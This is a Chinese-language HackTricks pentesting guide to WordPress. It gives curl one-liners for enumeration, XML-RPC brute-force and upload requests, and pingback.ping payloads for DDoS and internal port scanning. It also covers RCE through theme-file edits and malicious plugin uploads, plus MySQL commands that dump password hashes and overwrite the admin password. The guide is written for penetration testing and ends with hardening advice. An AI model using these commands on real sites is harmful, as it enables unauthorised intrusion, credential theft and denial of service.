hacktricks/network-services-pentesting/pentesting-web/wordpress.md

18 KiB
Raw Blame History

Wordpress

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式


使用Trickest可以轻松构建和自动化工作流程,使用世界上最先进的社区工具。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}

基本信息

上传的文件位于:http://10.10.10.10/wp-content/uploads/2018/08/a.txt
主题文件位于/wp-content/themes/因此如果更改主题的某些php以获得RCE则可能会使用该路径。例如使用twentytwelve主题,您可以在以下位置访问404.php文件:/wp-content/themes/twentytwelve/404.php
另一个有用的URL可能是 /wp-content/themes/default/404.php

wp-config.php中,您可以找到数据库的根密码。

要检查的默认登录路径:/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/

主要WordPress文件

  • index.php
  • license.txt 包含有用的信息如安装的WordPress版本。
  • wp-activate.php 用于设置新WordPress站点时的电子邮件激活过程。
  • 登录文件夹(可能已重命名以隐藏):
    • /wp-admin/login.php
    • /wp-admin/wp-login.php
    • /login.php
    • /wp-login.php
  • xmlrpc.php 是WordPress的一个功能文件它使数据能够通过HTTP作为传输机制和XML作为编码机制进行传输。这种通信方式已被WordPress REST API取代。
  • wp-content文件夹是存储插件和主题的主目录。
  • wp-content/uploads/ 是存储上传到平台的任何文件的目录。
  • wp-includes/ 这是存储核心文件的目录如证书、字体、JavaScript文件和小部件。
  • wp-sitemap.xml 在WordPress版本5.5及更高版本中WordPress会生成一个包含所有公共帖子和可公开查询的帖子类型和分类法的站点地图XML文件。

后渗透

  • wp-config.php文件包含WordPress连接到数据库所需的信息如数据库名称、数据库主机、用户名和密码、身份验证密钥和盐以及数据库表前缀。此配置文件还可用于激活DEBUG模式这在故障排除中很有用。

用户权限

  • 管理员
  • 编辑者:发布和管理自己和其他人的帖子
  • 作者:发布和管理自己的帖子
  • 贡献者:编写和管理自己的帖子,但不能发布它们
  • 订阅者:浏览帖子并编辑其个人资料

被动枚举

获取WordPress版本

检查是否可以找到文件/license.txt/readme.html

在页面的源代码中(例如来自https://wordpress.org/support/article/pages/的示例):

  • grep
curl https://victim.com/ | grep 'content="WordPress'
  • meta name

  • CSS link files

  • JavaScript files

获取插件

{% code overflow="wrap" %}

curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

{% endcode %}

获取主题

{% code overflow="wrap" %}

curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

提取一般版本

{% code overflow="wrap" %}

curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

{% endcode %}


使用 Trickest 可以轻松构建并由全球最先进的社区工具驱动的自动化工作流程
立即获取访问权限:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}

主动枚举

插件和主题

您可能无法找到所有可能的插件和主题。为了发现它们所有,您需要主动暴力破解插件和主题列表(幸运的是,有自动化工具包含这些列表)。

用户

ID 暴力破解

通过暴力破解用户ID您可以从WordPress网站获取有效用户

curl -s -I -X GET http://blog.example.com/?author=1

如果响应为20030X表示id是有效的。如果响应为400则id是无效的。

wp-json

您还可以尝试通过查询获取有关用户的信息:

curl http://blog.example.com/wp-json/wp/v2/users

另一个可以揭示有关用户信息的 /wp-json/ 端点是:

curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL

注意,此端点仅公开已发布帖子的用户。仅提供启用此功能的用户的信息

还要注意**/wp-json/wp/v2/pages**可能会泄漏IP地址。

登录用户名枚举

在**/wp-login.php登录时,消息会根据指定的用户名是否存在不同**。

XML-RPC

如果xml-rpc.php处于活动状态则可以执行凭据暴力破解或者使用它来发动对其他资源的DoS攻击例如您可以使用此工具来自动化此过程)。

要查看它是否处于活动状态请尝试访问_/xmlrpc.php_并发送此请求

检查

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

凭证暴力破解

wp.getUserBlogs、**wp.getCategoriesmetaWeblog.getUsersBlogs**是一些可用于暴力破解凭证的方法。如果你找到任何一个,你可以发送类似以下内容:

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

在一个200状态码的响应中如果凭据无效应该出现消息_"用户名或密码不正确"_。

使用正确的凭据,您可以上传一个文件。在响应中将显示路径(https://gist.github.com/georgestephanis/5681982)

<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

也有一种更快的方法可以使用**system.multicall**来暴力破解凭据,因为您可以在同一请求中尝试多个凭据:

绕过双因素认证

这种方法适用于程序而非人类,并且比较老旧,因此不支持双因素认证。因此,如果您拥有有效凭据但主入口受到双因素认证保护,您可能能够滥用 xmlrpc.php 以绕过双因素认证登录。请注意,您将无法执行通过控制台可以执行的所有操作,但您仍然可能能够像 Ippsec 在 https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s 中解释的那样实现 RCE。

DDoS 或端口扫描

如果您可以在列表中找到 pingback.ping 方法,您可以让 WordPress 向任何主机/端口发送任意请求。
这可用于要求数千个 WordPress 站点访问一个位置(从而在该位置引发DDoS),或者您可以使用它来让WordPress扫描一些内部网络(您可以指定任何端口)。

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

如果您得到的faultCode大于017这意味着端口是开放的。

查看前一节中对**system.multicall**的使用,了解如何滥用此方法来发动 DDoS 攻击。

DDoS

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>

wp-cron.php DoS

这个文件通常存在于Wordpress站点的根目录下/wp-cron.php
当访问这个文件时会执行一个“繁重”的MySQL 查询,因此可以被攻击者用来引发DoS
此外,默认情况下,wp-cron.php会在每次页面加载时被调用每当客户端请求任何Wordpress页面时这在高流量站点上可能会引起问题DoS

建议禁用Wp-Cron并在主机内创建一个真正的cronjob以在规律的时间间隔内执行所需的操作而不会引起问题

/wp-json/oembed/1.0/proxy - SSRF

尝试访问 https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.netWordpress站点可能会向您发出请求。

当它不起作用时的响应:

SSRF

{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}

这个工具检查methodName: pingback.ping和路径**/wp-json/oembed/1.0/proxy**,如果存在,它会尝试利用它们。

Automatic Tools

cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"


使用 Trickest 可轻松构建并通过全球最先进的社区工具自动化工作流程
立即获取访问权限:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}

通过覆盖一个位获取访问权限

这不仅仅是一个真正的攻击,而是一种好奇。在 CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man 中,您可以翻转任何 WordPress 文件的 1 位。因此,您可以翻转文件 /var/www/html/wp-includes/user.php 的位置 5389,以将 NOT (!) 操作变为 NOP。

if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(

面板RCE

修改主题中使用的php文件需要管理员凭据

外观 → 主题编辑器 → 404模板在右侧

更改内容为php shell

搜索互联网,找出如何访问更新后的页面。在这种情况下,您必须访问这里:http://10.11.1.234/wp-content/themes/twentytwelve/404.php

MSF

您可以使用:

use exploit/unix/webapp/wp_admin_shell_upload

插件RCE

PHP插件

可能可以将.php文件上传为插件。
例如使用以下方式创建您的php后门

然后添加一个新插件:

上传插件并点击立即安装:

点击“继续”:

可能看起来不会有任何变化但如果您转到媒体您将看到您上传的shell

访问它您将看到执行反向shell的URL

上传和激活恶意插件

此方法涉及安装已知易受攻击且可被利用以获取Web shell的恶意插件。此过程通过WordPress仪表板执行如下

  1. 获取插件从Exploit DB等来源获取插件例如此处
  2. 安装插件
  • 转到WordPress仪表板然后转到仪表板 > 插件 > 上传插件
  • 上传下载的插件的zip文件。
  1. 激活插件:一旦插件成功安装,必须通过仪表板激活。
  2. 利用
  • 安装并激活插件“reflex-gallery”后可以利用其已知易受攻击的漏洞。
  • Metasploit框架提供了此漏洞的利用。通过加载适当的模块并执行特定命令可以建立一个meterpreter会话从而未经授权地访问站点。
  • 值得注意的是这只是利用WordPress站点的众多方法之一。

内容包括描绘在WordPress仪表板中安装和激活插件步骤的视觉辅助。然而重要的是要注意未经授权地利用漏洞是非法和不道德的。这些信息应该负责任地使用只能在合法的情况下使用例如在明确获得许可的渗透测试中。

有关更详细的步骤,请查看: https://www.hackingarticles.in/wordpress-reverse-shell/**

后期利用

提取用户名和密码:

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"

更改管理员密码:

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"

WordPress保护

定期更新

确保WordPress、插件和主题是最新的。还要确认在wp-config.php中启用了自动更新

define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );

此外,只安装可信赖的WordPress插件和主题

安全插件

其他建议

  • 删除默认的 admin 用户
  • 使用 强密码双因素认证
  • 定期审查用户的 权限
  • 限制登录尝试 以防止暴力破解攻击
  • 重命名 wp-admin.php 文件并仅允许内部访问或特定IP地址访问。


使用 Trickest 可轻松构建和 自动化工作流程,由全球 最先进 的社区工具提供支持。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}

从零开始学习AWS黑客技术成为专家 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式